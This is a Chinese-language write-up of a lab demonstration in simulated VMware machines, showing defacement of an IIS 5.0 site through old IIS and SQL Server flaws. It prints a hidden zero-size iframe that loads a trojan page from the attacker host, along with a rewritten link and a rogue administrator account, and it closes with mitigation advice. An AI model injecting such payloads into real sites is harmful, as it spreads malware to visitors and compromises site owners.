##CONTINUE##
主題:利用系統漏洞置換目標網站網頁並加入惡意連結
VMWARE 模擬環境:
Hacker:IP:192.168.123.101
工具:弱點掃描工具、網頁上傳工具
Server:IP:192.168.123.100
服務:IIS 5.0、SQL Server 2000、ASP程式、本機帳號
模擬過程:
Hacker 首先使用弱點掃描工具發現目標Server 192.168.123.100 (DNS名稱暫訂為 www.xyz.com.tw 非真實主機),具有IIS WINCGI 的弱點(註:該弱點非常老舊除非管理者都沒修正,不然應該不會出現才對。),點選該連結進入後發現可以看見 192.168.123.100 的Web資料夾內存放資料與該網站的實體路徑名稱,尋找目標Web網站的網頁名稱與則可得知其放置的實體位置為[ C:\Inetpub\wwwroot\STORE\happy\happyL.htm ]。
目標想要置換的網頁名稱為[ happyL.htm ]、其猜測出的 IIS 主目錄路徑為[c:\inetpub\wwwroot\STORE]。
將原本的正常的[ happyL.htm ]網頁[ 另存新檔 ]取得其網頁與它原來一模一樣之副本,再將此副本修改加入惡意連結[ <iframe src=http://192.168.123.101/muma/06014.htm width=0 height=0></iframe> ]與變更網頁內的超連結[ <a href="http://192.168.123.101/muma/index.htm" target="happyR"> ]之後備用。
再使用網頁上傳工具利用SQL Server與Web Server的弱點來新增具有管理權限的[本機使用者帳號為 shanlu],並利用此帳號來上傳[製作好且具有惡意連結的偽造網頁]至目標電腦的預設IIS主目錄路徑中[ 覆蓋 ]原來的 happyL.htm 相同名稱的檔案,達到覆蓋或置換網頁之目的。
註:
- 此手法只能針對附檔名為[ htm、html ]來做置換之目的,如果附檔名為[ asp、php ]等網頁程式則無法使用此手法。
- 該手法只是呈現利用[ 古老漏洞 ]來執行猜測網站路徑及權限洩漏,當然[ 新產生的漏洞 ]仍然可以循類似方式來達到目的,所以仍須定時不斷修正漏洞。
防治手段:
- 修正與修補 IIS 5.0 與 SQL Server 的弱點,沒有弱點就比較不容易達成網頁置換,尤其是具有[ 遠端控制或權限洩漏 ]的弱點一定要優先修正。
- 更改IIS預設的首頁名稱(不要叫做default 或 index)。
- 更改預設IIS主目錄路徑(不要在c:\inetpub\wwwroot 或與其相關的子資料夾之下)。
- 建置具第七層應用程之防火牆或IDS/IDP等多層次資訊安全架構,原因為大多數設定良好的防火牆或IDS/IDP設備均可阻擋此類的手法。
特別聲明:
- 本影片預設都沒有錄製聲音。
- 此模擬過程為Demo常見之入侵手法,示範及被攻擊主機均為VMWARE模擬機器而非真實主機。
- 該手法所利用之弱點非常古老,一般來說除非使用完全沒有修正過的IIS,不然應該不會發生才是。
- 本示範檔並非[教授入侵技巧],相關[駭客工具]及[木馬程式]等檔案請勿詢問及索取。
- 部分關鍵畫面採用霧狀馬賽克顯示,以避免旁人有樣學樣。